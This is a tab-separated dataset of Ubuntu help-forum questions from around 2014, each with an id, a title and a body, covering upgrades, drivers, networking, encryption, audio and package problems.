458138	full disk encryption vs home folder encryption	what is the difference between home folder encryption and full disk encryption that we find in the ubuntu versions ? which one of them is more secure ? using them both could make my laptop more safe ?
458141	what is the terminal command for launching a web app ?	in ubuntu 14.04 , we know all web apps run in ubuntu-made browser instead of firefox . i would like gmail and some other services webapps ( in the ubuntu made browser ) to launch in the startup . to do this , i need terminal command line to launch web app . i tried , gmail , gmail , unity-webapps-gmail , webapps-gmail . nothing i tried works . i request someone to help me .
458145	git on ubuntu get : gnutls_handshake ( ) warning : the server name sent was not recognized	when i run : 'git clone ... ' from linux , i successfully clone it . but when i run the same command form ubuntu i get the following error message : fatal : unable to access 'https : //gitserver ... ' : gnutls_handshake ( ) warning : the server name sent was not recognized i also run : git_curl_verbose=1 git clone https : //gitserver ... on the ubuntu machine i get the output : cloning into 'aaa ' ... * could n't find host gitserver in the .netrc file ; using defaults * adding handle : conn : 0x24af4a0 * adding handle : send : 0 * adding handle : recv : 0 * curl_addhandletopipeline : length : 1 * - conn 0 ( 0x24af4a0 ) send_pipe : 1 , recv_pipe : 0 * about to connect ( ) to gitserver port 443 ( # 0 ) * trying 111.222.333.444 ... * connected to gitserver ( 111.222.333.444 ) port 443 ( # 0 ) * error reading ca cert file /etc/httpd/cert/bbb.crt ( error while reading file . ) * gnutls_handshake ( ) warning : the server name sent was not recognized * common name : warning could n't obtain * server certificate verification skipped on linux i get : initialized empty git repository in /path/to/aaa/.git/ * could n't find host gitserver in the .netrc file ; using defaults * about to connect ( ) to gitserver port 443 ( # 0 ) * trying 111.222.333.444 ... * connected to gitserver ( 111.222.333.444 ) port 443 ( # 0 ) * initializing nss with certpath : sql : /etc/pki/nssdb * skipping ssl peer certificate verification * ssl connection using tls_dhe_rsa_with_aes_256_cbc_sha * server certificate : ... ... . and here i get the data okay . what the different between ubuntu and redhat ? thanks .
458146	import openvpn config file using command line is not working on ubuntu 14.04	i have openvpn config files for tunnelbrick for mac laptop , now i would like to import these files for ubuntu 14.04 . i know there is an open bug to import openvpn config file using network manager : https : //bugs.launchpad.net/ubuntu/+source/network-manager-openvpn/+bug/1294899 so i tried to use command line : ~/openvpn $ sudo openvpn -- config config.ovpn and the result : enter auth username : cuong enter auth password : wed apr 30 14:21:12 2014 warning : file 'client-tls.key ' is group or others accessible wed apr 30 14:21:12 2014 control channel authentication : using 'client-tls.key ' as a openvpn static key file wed apr 30 14:21:12 2014 udpv4 link remote : [ af_inet ] 113.161.74.10:1195 wed apr 30 14:21:12 2014 warning : this configuration may cache passwords in memory -- use the auth-nocache option to prevent this wed apr 30 14:21:14 2014 [ vpn.webonyx.com.vn ] peer connection initiated with [ af_inet ] 113.161.74.10:1195 wed apr 30 14:21:16 2014 tun/tap device tun0 opened wed apr 30 14:21:16 2014 do_ifconfig , tt- > ipv6=0 , tt- > did_ifconfig_ipv6_setup=0 wed apr 30 14:21:16 2014 /sbin/ip link set dev tun0 up mtu 1500 wed apr 30 14:21:16 2014 /sbin/ip addr add dev tun0 local 10.0.10.18 peer 10.0.10.17 wed apr 30 14:21:16 2014 initialization sequence completed and the command line stops at 'initialization sequence completed ' , but i can not access to the vpn . my config file : dev tun persist-tun persist-key cipher aes-128-cbc tls-client client resolv-retry infinite remote vpn.webonyx.com.vn 1195 udp tls-remote vpn.webonyx.com.vn auth-user-pass ca ca.crt cert cuong.crt key cuong.key tls-auth client-tls.key 1 comp-lzo is there any way to work around this ?
458155	how can i install ubuntu one after upgrading to ubuntu 14.04 ?	i upgraded from 13.10 to 14.04 without realizing that the ubuntu one package was going to be removed ( my fault ) . i know the ubuntu one service is being discontinued but i 'd like to keep on using it at least until i have time to look for something else to replace it . is there a way to install ubuntu one again on ubuntu 14.04 ? thanks !
458157	what problems can i expect using a 13.10 saucy repository in 14.04 trusty ?	i just installed virtualbox 4.3.10 for linux following the instructions that i found at this site , but the latest repository available is for ubuntu 13.10 , not ubuntu 14.04 . this is the source that i appended to my /etc/apt/sources.list deb http : //download.virtualbox.org/virtualbox/debian saucy contrib i tried to just replace the word saucy with trusty , but that repository is not found it gives a 404 error . however , i was able to use the saucy source and every thing seems to be working properly so far . the installation went smoothly . i do plan on checking periodically to see when virtualbox does update to trusty source so that i can get rid of the saucy source . my main question here is this going to cause me any serious problems later on , or does it really not matter too much ? update : no longer a problem . the virturalbox web site has now made their update to trusty 14.04 repository .
458159	how to install ubuntu to a already encrypted partiton without formatting it in 14.04	ubuntu killed the alternative installer buuuuuuh ! ! i am not sure but i think this was possible before with it . as far as i understand it the installer actually recreates a encrypted volume even if you enter the password for the actually existing volume . after that it forces you to format the / partition . probably because it just does not exist . what i am looking for is something like this where i can uncheck the formatting and reinstall to the same partition just deleting system files . i have played around with a virtual machine and the installer is just annoying , it can do nothing besides this 3 oversimplified things . it always dismounts all partitions when i try to manually open a luks container and give it another mapper name then the default ones it wont detect it . so i hope i can easy modify the installer script or something like that to get what i need . i know the installed installs everything to /target maybe there is another way to trick it , i think i have read something about that . if i have to to the crypttab and fstab manually afterwards this would be a problem for me . you may ignore the fancy btrfs stuff here and just tell me how i would do it with ext and i would probably figure out the rest myself i want to start a big risky btrfs adventure where i actually have just one partition and and the standard @ and @ home sub-volumes and then i like to be able to reinstall . i could then before reinstall just rename the subvolumes to @ _old and @ home_old and reinstall ubuntu again to that same partiton and copy over what a need after . i do not like the idea of having / and /home `` hard '' separated with 2 different luks containers since i actually do not need a small partiton just for the system to be able to clone it with clonezilla as backup for some system fail since with btrfs i have snapshots . i also do not know how much space i will actually need for the snapsotting of / so i do not want to be wrong with the space my just avoiding this separation . but that just the sidestory . i always wanted to know how to do this and like to know it now even more .
458166	13.10- > 14.04 upgrade hangs on mdadm configure	i have a ubuntu 13.10 server installation . i 'm trying to get it to 14.04 using do-release-upgrade it hangs when it tries to configure mdadm , i see this in the terminal : setting up mdadm ( 3.2.5-5ubuntu4 ) ... removing any system startup links for /etc/init.d/mdadm-raid ... update-initramfs : deferring update ( trigger activated ) update-grub is /usr/sbin/update-grub searching for grub installation directory ... found : /boot/grub searching for default file ... found : /boot/grub/default testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst searching for splash image ... none found , skipping ... found kernel : /vmlinuz-3.13.0-24-generic found kernel : /vmlinuz-3.11.0-19-generic found kernel : /vmlinuz-3.5.0-27-generic found kernel : /vmlinuz-3.0.0-26-generic if i ctrl-c at this point ( after waiting for 30 mins ! ) , it carries on with the rest of the upgrade , but i 'm left with the instruction to do a dpkg -- configure -a at the end . and when i do , it does the same at the same point . any idea what 's happening and how i get this upgrade to finish ? any pointers welcome !
458167	trying to get vundle to work with vim	i am following this tutorial , which is actually the vundle 's homepage in github and in step 3 it 's telling me to put some code into .vimrc : '' put this at the top of your .vimrc to use vundle . remove plugins you do n't need , they are for illustration purposes . '' however , i do n't have .vimrc file and from the research i have done people said it should n't be necessarily there to start with . so i created this file in /usr/share/vim and put the code it needed in it . in this level i might be doing something wrong cuz i ca n't proceed to level 4 and run the : plugininstall inside vim . i would like to know where did i do the wrong step . thanks
458168	searching for supported soundcard ?	i am searching for a supported ( possibly fully supported ) internal soundcard for my motherboard asus b85m-e and ubuntu 14.04 . i really need it to be able to connect a mixer and record music , any advice ? thanks . n.b . i`ve asked asus and creative and they reply saying that they have no clue and they do not support linux
458169	qml : how to do variables ?	in qml , i am just looking for a way to do fairly simple variables : bool string integer
458172	upgrading from netbeans 7.3 to netbeans 8.0 on ubuntu 13,10	is there a better way to upgrade netbeans without having to download the whole new version again and installing it ? am running ubuntu 13.10 , i want to upgrade my netbeans installation from 7.3 to 8.0 the only option i get is to download netbeans 8.0 and install it . so should i uninstall 7.3 first then in download and install 8.0 ? is there a better way of upgrading netbeans on ubuntu ? thanks in advance for your help
458173	reliance . netconnect on kubuntu	i recently installed kubuntu . 14.04 and . i am not able to use reliance . netconnect . on it . pls.help how to connect . to internet . using reliance . netconnect . on kubuntu . 14.04
458174	ubuntu 14.04 ( amd64 ) not detecting all of my memory	i 've got 4gb of ram installed in my machine but ubuntu only detects 2.8gb of ram if i run uname -a i get : linux delillo 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux which seems to confirm that i 'm running ubuntu in 64-bit . i also have an nvidia graphics card installed that may have memory allocated to it . but 1.2gb seems a bit excessive . i 've had a poke around in bios and ca n't seem to find any settings to change the amount of ram allocated to my gpu . is this just something i have to live with ? edit : sudo lshw -class memory outputs : pci ( sysfs ) *-firmware description : bios vendor : phoenix technologies , ltd physical id : 0 version : 6.00 pg date : 06/19/2008 size : 128kib capacity : 448kib capabilities : isa pci pnp apm upgrade shadowing cdboot bootselect socketedrom edd int13floppy360 int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot zipboot biosbootspecification *-cache:0 description : l1 cache physical id : 8 slot : internal cache size : 32kib capacity : 32kib capabilities : synchronous internal write-back *-cache:1 description : l2 cache physical id : 9 slot : external cache size : 4mib capacity : 4mib capabilities : synchronous external write-back *-memory description : system memory physical id : 24 slot : system board or motherboard size : 4gib *-bank:0 description : dimmproject-id-version : lshwreport-msgid-bugs-to : full name < email @ address > pot-creation-date : 2009-10-08 14:02+0200po-revision-date : 2012-02-05 00:26+0000last-translator : andi chandler < unknown > language-team : english ( united kingdom ) < en_gb @ li.org > mime-version : 1.0content-type : text/plain ; charset=utf-8content-transfer-encoding : 8bitx-launchpad-export-date : 2014-04-10 12:53+0000x-generator : launchpad ( build 16976 ) synchronous 50410 mhz ( 0.0 ns ) physical id : 0 slot : a0 size : 2gib width : 64 bits clock : 3165mhz ( 0.3ns ) *-bank:1 description : dimmproject-id-version : lshwreport-msgid-bugs-to : full name < email @ address > pot-creation-date : 2009-10-08 14:02+0200po-revision-date : 2012-02-05 00:26+0000last-translator : andi chandler < unknown > language-team : english ( united kingdom ) < en_gb @ li.org > mime-version : 1.0content-type : text/plain ; charset=utf-8content-transfer-encoding : 8bitx-launchpad-export-date : 2014-04-10 12:53+0000x-generator : launchpad ( build 16976 ) synchronous 50410 mhz ( 0.0 ns ) physical id : 1 slot : a1 size : 2gib width : 64 bits clock : 3165mhz ( 0.3ns ) which suggests that it 's detecting two 2gb sticks of ram , but free outputs : total used free shared buffers cached mem : 2822496 2575872 246624 70960 15316 338656 -/+ buffers/cache : 2221900 600596 swap : 0 0 0 edit 2 : just ran memtest . it correctly reports that i have two 2gb sticks installed , but claims my total memory is 2814mb . when it tests slot0 it runs from 196kbs - 2048mb and then when it tests slot1 it runs from 2048mb - 2815mb . it also claims my cached memory is 2814mb with 332kb reserved . everything else ( fsb , memory speed , caches , etc . ) seem to be reported correctly . bios correctly reports that i have 4096mb installed . i now suspect this is a hardware issue .
458176	can i install intel graphics installer for one version on the next version ?	on the intel site for open source there is graphic installer available to download for 13.10 , but not yet for 14.04 . can i install graphic for 13.10 on 14.04 ?
458178	graphics card issue ( gt 630m )	i 've installed ubuntu 14.04 and i have a problem with the graphic card . i 've a i5 processor , so it has dual and switchable graphics , intel and nvidia . the trouble comes with the nvidia driver , as when i installed the one suggested on the `` driver installer '' in ubuntu , when rebooting the desktop suddenly freezes . do you know how can i fix it ?
458180	ubuntu 14.04 not supporting headphones	currently i am using ubuntu 14.04 32 bit version . but now i am experiencing problem with output audio jack . whenever i am connecting any headphones it is not giving sudio output . please help !
458181	weird error when launching vlc from command line	does anyone know how to solve this error ? i tried viewing the content of the files in question , but i can only see weird characters . can not load module `/usr/lib/vlc/plugins/gui/libqt4_plugin.so ' ( /usr/lib/libegl.so.1 : undefined symbol : _mali_clz_lut )
458182	battle.net refuses to connect to the internet after update to 14.04	i 'm relatively new to ubuntu , please excuse my missing knowledge . after i updated this morning , i wanted to play some hearthstone which i run with wine 1.6.2 . the game itself uses a client named battle.net which needs to connect to the internet , but it refuses to do so after the update . i 'm not using the latest version of wine because it bugged alot with it . any tips how i can get it back to work ? thanks in advance .
458183	how connect to internet from ubuntu in the middle of pc and internet	i have pc with windows os this pc connected to my laptop by network cable and eth0 and my laptop os is 14.04. also my labtop is connected to my internet adsl modem via wifi by wlan0 . i want to know how i can make my ubuntu as a router which give this ability to my windows can has a access to internet via the router ?
458185	permission denial connecting to nas	trying to connect to our companies local nas with smb : // in the file manager . i 'm able to log in when my credentials and view the folders , but when i click on a folder i get a permission denial with this location could not be displayed . if i do a smbtree i do n't see the networks mounted . i recall i had them mounted prior i did an apt-get update on samba . and i remember i used to be able to view them with smbtree before this recent issue and was also granted access to the folders . nmblookup -a < ip > generates : company host name < 00 > - < group > b < active > server host < 00 > - b < active > server host < 20 > - b < active > mac address = i also tried mounting the two folders first having my credentials stored in a .smb file with : sudo mount -t cifs -o credentials=/home/user/.smb // < ip > / < folder > /mnt/volume_1 the command seems to mount , yet they do n't show up with smbtree .
458188	nfsv4 with kerberos	i am trying to configure nfsv4 with kerberos according here . how i create credentials for server and clients ?
458191	videos from the guardian website not loading ( chrome )	i was trying to load this video from the guardian website but it does n't seem to work . other videos on the site do n't seem to work either . i 'm running ubuntu 14.04 lts ( 64-bit ) and have flash ( 13,0,0,206 ) installed and working correctly on other sites , it 's just the guardian media player that does n't seem to work . at first i thought it was because i am using adblock , but even if i disable it the video still fails to load . i am using chrome 34.0.1847.132 . the video works in my firefox , which does n't have adblock installed at all .
458193	login names in ubuntu 14.04	i am using pbis open ( used to be likewise ) to authenticate against an active directory . this worked fine in 12.04 with my username ( ian.collins ) . i installed a fresh 14.04 and the latest pbis open . i have joined our active directory domain - and can list all users in the domain . i can login ( using ssh ) to my 14.04 machine with users that have no `` . '' in the login name ( e.g . sqa ) - but not with any users with a `` . '' ( e.g . ian.collins ) . can anyone make any suggestions ? in auth.logâś apr 30 18:34:57 nzitianc sshd [ 3886 ] : [ lsass-pam ] [ module : pam_lsass ] pam_sm_authenticate error [ login : ian.collins ] [ error code:40286 ] apr 30 18:34:59 nzitianc sshd [ 3883 ] : error : pam : authentication failure for ian.collins from localhost
458194	switching to hdmi audio when hdmi is plugged into a laptop ( 14.04 )	i 'm trying to get my laptop to switch the audio to hdmi when it 's plugged in , and back to standard analog when it 's removed . i set up a udev rule to trigger a script to perform the switching , however i 'm having problems getting it to work . it appears that until i select the hdmi audio output in the sound settings , it is not recognised as a available sink , also once the hdmi audio output is selected , the analog output is no longer listed . $ pactl list short sinks # hdmi plugged in , not selected in sound settings . 5 alsa_output.pci-0000_00_1b.0.analog-stereo module-alsa-card.c s16le 2ch 44100hz suspended kingamajick @ kingamajick-laptop : ~ $ pactl list short sinks # hdmi selected in sound settings 7 alsa_output.pci-0000_00_1b.0.hdmi-stereo module-alsa-card.c s16le 2ch 48000hz suspended kingamajick @ kingamajick-laptop : ~ $ pactl list short sinks # hdmi removed 9 alsa_output.pci-0000_00_1b.0.analog-stereo module-alsa-card.c s16le 2ch 48000hz suspended the script i 'm using the toggle the output is as follows : # ! /bin/bash hdmi_status=`cat /sys/class/drm/card0/*hdmi*/status` inputs= ( $ ( pacmd list-sink-inputs | grep index | awk ' { print $ 2 } ' ) ) if [ $ hdmi_status = `` connected '' ] then pactl set-default-sink alsa_output.pci-0000_00_1b.0.hdmi-stereo for i in $ { inputs [ * ] } ; do pacmd move-sink-input $ i alsa_output.pci-0000_00_1b.0.hdmi-stereo & > /dev/null ; done else pactl set-default-sink alsa_output.pci-0000_00_1b.0.analog-stereo for i in $ { inputs [ * ] } ; do pacmd move-sink-input $ i alsa_output.pci-0000_00_1b.0.analog-stereo & > /dev/null ; done-server $ pulse_server set-card-profile 0 output : analog-stereo+input : analog-stereo fi the script gives an error about no such sink when i trigger it before i select hdmi in the sound settings .
458197	how to configure version control for qt ?	it might be just a basic thing for many , but i 'm stuck at `` qt version control '' , and it 's really annoying me . i 'm on ubuntu 12.04 lts and my qt version is 2.4.1 . here 's the message which is displayed : no valid qt versions found . please add a qt version in tools/options or via the maintenance tool of the sdk . i 've installed bazaar ( bzr ) disabled all other version control plugins except bazaar but still ca n't get past the problem . please guide me if i have to learn more about configuring with bazaar version control . i 've added the qmake path too . i even tried disabling all the version control plugins but that too did n't go as i expected . i am ( or maybe i should use was ) thinking of learning to develop/code with qt but have n't managed to get past creating a new project structure ! please guide me through this .
458198	xubuntu vmware player missing vmrun utility	i have xubuntu 14.04 and i have installed vmware player from the official website . vm player runs fine , no problem . but i ca n't find utility vmrun , it 's not found anywhere in the system . do i have to install it alone from another package or how can i get it ? i thought it comes with the vmware player basic installation . thanks for any hints in advance .
458200	how can i delete a volume group in terminal ?	i am trying to setup lvm for my netbook 's two , small ssds ( 4 & 8gb ) . after a lot of trial and error , i followed this walk-through : how to set up multiple hard drives as one volume . i have completed the steps for my 4gb volume ( /dev/sda ) and successfully set up a vg ( `` vgsystem '' ) and lv ( `` lvfacade '' ) . however , when repeating the steps for the 8gb volume ( /dev/sdb1 ) , i was unable to extend `` vgsystem '' to include /dev/sdb1 because i had added it to a vg ( `` vgsystem2 '' ) earlier . how can i remove `` vgsystem2 '' and add /dev/sdb1 to `` vgsystem '' ? i appreciate the help .
458201	how can i upgrade ubuntu to newer release manually ( without using update manager ) ?	i need this for 3 purposes : for some reason , ubuntu 13.04 on my home computer did not want to upgrade to 13.10 . it said `` no new releases found '' . and some ubuntu derivatives ( such as mint ) do not use update-manager at all . also , in manual mode it is possible though not recommended to skip releases : p
458208	how long does ubuntu take to create ext4 journal ; ing file systems for 500gb drives ?	i have a new server with four new 500gb rotary hard drives . i am installing ubuntu 14.04ls from a bootable usb flash drive . i asked ubuntu to format the hd 's with ext4 journaling file systems . three of the hard drives have just one 500gb partition ( for data and backup ) and the fourth hd has two partitions of 250gb for os and swap space . the drive works well with already formatted hd 's and lets me complete the installation in about 15 minutes . however , it has been working on partition # 1 of the first 500gb hd for over five hours . is this normal ? how long should it take to create this type of filing system on a 500gb hd ?
458210	would removing compiz from ubuntu 14.04 affect unity or any other such dependencies ?	since compiz is using too much resources in ubuntu 14 , i wish to remove it.i 'm worried if that would result in affecting unity ? ( i do n't need the fancy visualizations )
458211	how to format my pendrive with f2fs filsystem using gparted ?	i have a alcor micro corp . flash drive 2gb pendrive which i would like to format using f2fs partition . i tried using gparted 0.18 to format it however , f2fs seems to be disabled . is it possible to format my pendrive using f2fs ? if yes , how do i do it using gparted p.s . : if it is not possible using gparted 0.18 , alternatives are most welcome .
458212	gray screen using rdp to 14.04	cant use remote desktop to connect to my 14.04 server using amazon.installed lubuntu desktop and xrdp to remote to my instance unfortunately all i can see is the gray screen
458213	what is the steps should i take to install spideroak on a multi user ( or not ) system ?	i would really like to install spideroak to try as a u1 replacement . i am having a hard time finding a definitive guide to do so . is there such a guide , or could someone go though the process step by step . as a bonus because one of our computers is shared , are there specific steps that would help ( or hinder ) the ability to have it work for each individual user . i am using 13.10 , will upgrade to 14.04 once i get this working but something release agnostic would be best if possible .
458215	unbuntu 12.04 failing to update or install software very very flaky	after several days i am loosing the will to live . all i did was down load and install ubuntu 12.04 as a replacement for xp , this is the second download and install , the first download would n't install so i did it all again . it installed and i do have a desktop but the system is telling me the installer directory is broken , needs repair , the repair routine fails maybe because of a third party repository , it wants to send a bug fix - this process also fails . i cant find the edit command in the software centre to disable repositories , but as i try it says the kernel needs updating , off it goes updating - eventually it reports the kernel has updated ; the log says it has succeeded 5 times today , and still its reporting `` broken '' . during this process the wifi reports connected - disconnected - connected - disconnected as a constant distraction . eventually the system freezes . guys it does n't work , i have not been able to do anything useful with ubuntu ! in my experience its a random error generator . question : is there anything i can do to fix these issues and leave me with a stable operating system ? or do i buy a new pc with win 8.1 ? to make this report i am using the same machine booted on xp with no problems with the wifi and a solid stable reliable ( for the past 11 years ) operating system that just chugs away in the background where it belongs enabling me to be productive . the machine is a toshiba laptop 32 bit 1.4khz intel 2gb ram 250gb hard drive .
458217	error while tomcat installation	i am installing tomcat6 in ubuntu , it shows me following error invoke-rc.d : initscript tomcat6 , action `` start '' failed . at the time of installation get installed successfully but error while star * starting tomcat servlet engine tomcat6 [ fail ] please help me to resolve it used linked to install tomcat http : //install-things.com/2012/06/06/how-to-install-apache-tomcat-6-0-35-on-ubuntu-12-04-linux/ in catelina problem with directory [ /usr/share/tomcat6/shared ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ]
458219	default blacklist for ubuntu 12.04	i accidentally removed the /etc/modprobe.d/blacklist.conf file and i found that that can have consequences . already encountered the evbug module , , logging like mad . does someone have the default list of blacklisted modules , so that i can reinstate the file ? i figure that would save me the trouble of running in to potentially unwanted modules one by one .
458223	thunderbird links not opening 2nd instance of google chrome if chrome already open	when clicking on a link in an email in thunderbird the link should be opened in a new tab in google chrome but if google chrome is already open it opens up a 2nd instance of google chrome and then causes an error in chrome saying that it ca n't open the profile . why does clicking on a link in an email in thunderbird open a new instance of google chrome ? is there a way of stopping it and making the link open in a new tab in google chrome ?
458225	layout change with alt+shift in ubuntu 14.04 using gnome 3.10	i know that many have asked that question before , but i have seen no one ask it for ubuntu 14.04 . i have a test installation of ubuntu 14.04 with gnome 3.10 and i have also installed the flashback sessions . what i get is this : using either unity or the flashback sessions , ( compiz and metacity ) , i can change the change-layout combination to alt+shift and it works . just a note here using unity : if i go to : system settings -- > keyboard -- > shortcuts -- > typing -- > switch to next source , i can set it to super+space but not to alt+shift . if i go to : system settings -- > keyboard -- > text entry , i can set it to alt+shift l. now the first time i logged in to the gnome shell , the combination worked , but after a while it stopped . i tried every setting available through the guis but none of them worked properly . right now i am in a state where the combination works everywhere but the gnome-shell . if , working with gnome-shell , i go to : system settings -- > keyboard -- > shortcuts -- > typing -- > switch to next source , i can set it to super+space but not to alt+shift . also even if i set to super+space it does not work . if , working with gnome-shell , i go to : system settings -- > keyboard -- > layout settings , everything is disabled so i have to go to -- > shortcut settings where i can set it to super+space but not to alt+shift . also even if i set to super+space it does not work . ( it is actually the same with the above ) i have also tried to change it through gnome-tweak tool but what it does it is that it actually changes the `` modifiers-only switch to next source '' found in the above mentioned keyboard settings , but it still does not do the trick . in the gnome-shell the combination works only to change the layout from en to gr . in order to change from gr to en i have to use the mouse and go through the indicator on the top bar . which by the way does not follow the current layout anyway . having faced this problem in ubuntu 13.10 with gnome i hoped that it would be fixed in 14.04 . is there something that i am missing ? my os setup is ubuntu 14.04 64-bit , and gnome 3.10.4 . ( although strangely , when i go to the details on the system settings it shows that i am using ubuntu 13.10 ) i have set up the system but made no modifications to it whatsoever through command line . i have only used gui menus , and the only modifications i tried where the ones described above , regarding the change-layout key combination .
458228	ubuntu 13 update halted after attempting upgrade to 14.04	following message after updating to ubuntu 14 e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/co.archive.ubuntu.com_ubuntu_dists_trusty_universe_i18n_translation-en , e : the package lists or status file could not be parsed or opened . since then system can not be update ... thank you
458230	kick user out in sshrc	i have seen tutorials for reporting suspicious logins ( from the wrong ip ) using /etc/ssh/sshrc . i would like to take it to the next level and kick out those users ( close the ssh session immediately ) . i have tried exit ( does n't work ) and logout ( rejected : /etc/ssh/sshrc : line 16 : logout : not login shell : use `` exit '' ) . how can i do that ?
458231	standby sometimes needs hard reset on ubuntu 14.04	after setting up a fresh ubuntu 14.04 on a lenovo w540 i sometimes experience standby problems . about 50 % of the time standby works fine . i close the lid or click standby on the menu and it goes to sleep and wakes up correctly . sometimes though , the monitors blank , the fan goes up and it just stays that way . i found no way to revive it short of switching it off and back on . i guess it has something to do with an application i 'm running , but i could n't figure out which one . is there a way to find out what went wrong with a standby ? i disabled the nvidia graphics in grub and only use the internal one . when i ran ubuntu 13.10 with kind of the same setup for a couple weeks on that machine i did n't experience these problems . thanks for any ideas !
458232	continuous beep after upgrading to 14.04	i had a similar problem to that mentioned in this post on my dell optiplex desktop . after upgrading to 14.04 , i get a constant beeping sound coming from my machine . rebooting the system fixes this , but after a couple of minutes , the noise reappears .
458234	usb flash drive with used sapce but no files in it	i have a 16 gb usb flash drive . it has ~9 gb used space and ~6 gb free space as seen on disk utility . when i open the directory there are no files in it . also ls -al gives thanos @ thanos-laptop : /media/dcbd-fa98 $ ls -al total 12 drwx -- -- -- 2 thanos thanos 8192 jan 1 1970 . drwxr-xr-x 6 root root 4096 apr 30 13:31 .. any idea on how to see what are those files in the drive ?
458235	ubuntu 14.04 32bit canon lbp 2900	dopo l'aggiornamento ( senza disinstallare ) dalla versione 13.10 alla 14.04 la stampante non funziona pi첫 . provato a reinstallare ma niente ! translated to english : after the upgrade ( without uninstall ) from 13:10 to 14:04 the version printer no longer works . tried to reinstall but nothing !
458238	how to revert from gtk3 to gtk2 indicators in xfce4-panel ?	when with saucy , i used this tutorial to have gtk3 indicators in xfce4-panel : https : //wiki.ubuntu.com/xubuntu/roadmap/specifications/saucy/gtk3indicators now i upgraded to trusty and i see a messed up panel , so i 'd like to revert to the original indicators . how can i do ?
458239	gzip : stdin : unexpected end of file - > problem in extracting jdk-7u55-linux-x64.tar.gz	i have downloaded 'jdk-7u55-linux-x64.tar.gz ' when i execute following command to extract , sudo tar xvzf jdk-7u55-linux-x64.tar.gz also tried , sudo tar xvf jdk-7u55-linux-x64.tar.gz sudo tar xf jdk-7u55-linux-x64.tar.gz sudo tar -xvf jdk-7u55-linux-x64.tar.gz but am getting error at last as , gzip : stdin : unexpected end of file tar : unexpected eof in archive tar : unexpected eof in archive tar : error is not recoverable : exiting now how to resolve this ?
458240	unable to install languagetool 2.5 extension for libreoffice 4.2 on ubuntu 14.04	i am not able to install languagetool extension for libreoffice . getting exception when i try to install it . p.s . somebody says that the solution is installing openoffice.org-java-common package but ubuntu 14.04 does not have this package in its repository . system details : os : ubuntu 14.04 lts libreoffice : 4.2 ( 4.2.3.3 ) languagetool : 2.5 java : oracle jdk 1.8.0_05 exception message :
458241	xflock4 triggers standy instead of locking the screen	how do i get the standard behaviour for ctrl+alt+del back ? when i use the combination standy is triggered instead of screen lock .
458245	unable to get xmodmap working after suspend	i am using ubuntu 14.04 . i have a custom xmodmap keyboard layout . however , when i resume after suspend , the layout is gone . i have tried all things which were mentioned in the answers to this question : how do i set xmodmap on login ? neither using .xinitrc nor adding a command in the startup apps works . well , they do work after a usual reboot , but not after suspend . is there a file that is always execute after loggin in , no matter if it was a reboot or a resume from suspension ?
458247	how to make two directories identical ?	i have a documents file in my home directory as usual . now in my dropbox folder i have created a new directory named documents . now is there any way such that this two could be same ? i.e if i update any of this , both of them will be updated . i think it may be done by symlink , but the idea of symlinks is not clear to me about what it does .
458249	change gateway sequence with network manager	my computer has 2 ethernet ports and 1 wireless port . one of the ethernet ports ( eth5 ) and the wireless port ( wlan0 ) are both configured to connect to a network server , and the other ethernet port ( eth4 ) is configured to connect to a local network switch for communicating with some local devices . the route table of the computer is shown in this screen capture : my question is that , how i could change the sequence of the gateways with the network-manager in ubuntu , so that the gateway of wlan0 will be used before the eth4 's . otherwise when i unplug the cable from eth5 , i will lose connection to the network ( the gateway of eth4 will be used by default ) . i tried editing the /etc/network/interfaces file , but it conflicts with the network-manager , and it can not handle the dynamic events ( e.g. , when network cable is plugged or unplugged ) , meaning that its settings are static , while the network-manager can handle these things perfectly , and change the network configurations adaptively , so i would like to find a solution for this problem with network-manager . the os is ubuntu 13.04 32bit . thanks for viewing and i will appreciate for any advice !
458251	where in the debian source package do i specifiy where the program should be installed ?	currently my program installs to /usr/bin or whatever and i need to change it to /opt/appname . where do i specify that in the debian source package ? rasmus
458256	ubuntu 14.04 brightness issue with nvidia quadro	i recently upgraded from ubuntu 13.10 to 14.04 . everything is fine , except the brightness of my laptop screen . when i change the brightness the screen simply does not respond . i figured this was a graphics driver issue , but having updated and reinstalled all nvidia drivers the problem persists . it 's rather nasty , as the screen is now permanently set to the darkest setting , making it almost impossible to see anything . i also tried the solution proposed here : ubuntu 14.04 - brightness problem in hp hybrid laptop but this , sadly , did n't help either . i have a hp elitebook 8560w , with an nvidia quadro 1000m and am running the latest nvidia-current drivers available in the apt-get repo's for the record , i tried experimental nvidia drivers , which consequently crashed my entire os . therefore , i reinstalled 14.04 cleanly , yet this problem still persists
458261	transmission rpc slow down	i use transmission rpc to control transmission daemon on ubuntu 12.4 with nginx . when there are more than 25 active torrents , transmission rpc takes too long to respond , around 15 seconds to stop/add/pause a torrent . after restarting transmission daemon everything works fine but after couple of minutes it 's the same . i 've 16 gb ram and 2 3.0 ghz processors installed in my server and linux htop shows all normal and minimum . i tried increasing cache-size-mb but the problem persists . can someone help me ?
458265	epson stylus tx110 ink levels	i 'm running lubuntu 14.4 on my acer travelmate 2490 . i finally managed to get my epson stylus t110 to print , but the print utility does not show the ink levels ( one of the ink cartridges has now run out , so the printer refuses to print : - ( i have tried mtink , but this does not support my printer ( and i have no idea how to drive the thing ! ) any help would be greatly appreciated ( as simple as possible please , i can cut and paste , but that is as far as my terminal-skills go )
458274	how can i avoid `` hash sum mismatch '' while upgrading 13.10 to 14.04 from in.archive.ubuntu.com ?	when i start the software update manager after some time it gives the error which is error during update w : failed to fetch gzip : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_trusty_universe_source_sources hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_trusty_main_binary-i386_packages hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead . it gives the same error again and again , now what should i do ? ?
